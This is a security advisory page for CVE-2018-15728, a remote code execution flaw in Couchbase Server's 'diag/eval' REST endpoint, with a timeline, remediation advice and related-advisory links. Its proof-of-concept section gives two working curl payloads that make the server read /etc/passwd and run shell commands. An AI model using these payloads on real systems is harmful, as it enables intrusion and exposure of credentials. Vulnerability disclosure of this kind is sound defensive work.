Lucene search
Filip PalianPACKETSTORM:149068HistoryAug 24, 2018 - 12:00 a.m.
Couchbase Server Remote Code Execution
2018-08-2400:00:00
Filip Palian
packetstormsecurity.com
206
EPSS
0.022
Percentile
89.4%
`Hey,
Description:
Couchbase Server [1] exposes REST API [2] which by default is
available on TCP/8091 and/or TCP/18091.
Authenticated users can send arbitrary Erlang code to 'diag/eval'
endpoint of the API. The code will be subsequently executed in the
underlying operating system with privileges of the user which was used
to start Couchbase.
The 'diag/eval' endpoint was found to be referenced in the official
documentation [3][4][5], however, documentation doesn't contain any
information about the risks associated with allowing access to the
endpoint in question.
Unfortunately, I was not able to confirm which versions of Couchbase
are affected and whether 'diag/eval' endpoint is enabled by default.
You can use the PoC provided below in order to verify if your
installation is affected or not.
Proof of Concept:
1. curl -H "Authorization: Basic ABCD" http://x.x.x.x:8091/diag/eval
-X POST -d 'case file:read_file("/etc/passwd") of {ok, B} ->
io:format("~p~n", [binary_to_term(B)]) end.'
2. curl -H "Authorization: Basic ABCD" http://x.x.x.x:8091/diag/eval
-X POST -d 'os:cmd("env")'
Remediation:
Contact vendor for remediation guidance. Alternatively, restrict
access to the REST API and/or 'diag/eval' endpoint.
Timeline:
18.06.2018: Following vendor guidelines [6], the information about the
issue was sent to [email protected].
20.06.2018: Follow-up email was sent to the vendor to confirm receipt
of the original report.
21.08.2018: MDSec published advisory about the similar vulnerability
found in Apache CouchDB [7].
21.08.2018: CVE requested from MITRE.
22.08.2018: MITRE assigned CVE-2018-15728 for this issue.
23.08.2018: The advisory has been released.
References:
[1] https://www.couchbase.com/
[2] https://developer.couchbase.com/documentation/server/current/rest-api/rest-intro.html
[3] https://developer.couchbase.com/documentation/server/3.x/admin/Tasks/xdcr-modify-settings.html
[4] https://developer.couchbase.com/documentation/server/4.1/security/security-comm-encryption.html
[5] https://developer.couchbase.com/documentation/server/4.1/security/security-client-ssl.html
[6] https://www.couchbase.com/resources/security#VulnerabilityReporting
[7] https://www.mdsec.co.uk/2018/08/advisory-cve-2018-8007-apache-couchdb-remote-code-execution/
Thanks,
Filip Palian
`
Related
zdt
zdt
Couchbase Server Remote Code Execution Vulnerability
2018-08-24 00:00:00
cvelist
cvelist
prion
prion
Code injection
2018-08-24 19:29:00
Input validation
2022-06-14 17:15:00
Input validation
2018-07-11 13:29:00
nvd
nvd
cve
cve
openvas
openvas
Apache CouchDB 1.x < 1.7.2, 2.x < 2.1.2 Privilege Escalation Vulnerability - Linux
2018-08-09 00:00:00
Apache CouchDB 1.x < 1.7.2, 2.x < 2.1.2 Privilege Escalation Vulnerability - Windows
2018-08-08 00:00:00
Fedora: Security Advisory for couchdb (FEDORA-2020-83f513fd7e)
2020-03-15 00:00:00
checkpoint_advisories
checkpoint_advisories
Apache CouchDB Command Execution (CVE-2018-8007)
2019-02-20 00:00:00
osv
osv
CVE-2018-8007
2018-07-11 13:29:00
CVE-2018-11769
2018-08-08 15:29:00
gentoo
gentoo
CouchDB: Multiple vulnerabilities
2018-12-15 00:00:00
ubuntucve
ubuntucve
CVE-2018-8007
2018-07-11 00:00:00
CVE-2018-11769
2018-08-08 00:00:00
nessus
nessus
GLSA-201812-06 : CouchDB: Multiple vulnerabilities
2018-12-17 00:00:00
FreeBSD : couchdb -- multiple vulnerabilities (1e54d140-8493-11e8-a795-0028f8d09152)
2018-07-12 00:00:00
Fedora 31 : couchdb (2020-83f513fd7e)
2020-03-16 00:00:00
redhatcve
redhatcve
CVE-2018-11769
2022-05-21 00:23:59
fedora
fedora
[SECURITY] Fedora 32 Update: couchdb-3.0.0-1.fc32
2020-03-16 20:49:22
[SECURITY] Fedora 31 Update: couchdb-3.0.0-1.fc31
2020-03-14 00:38:05
freebsd
freebsd
couchdb -- multiple vulnerabilities
2017-11-14 00:00:00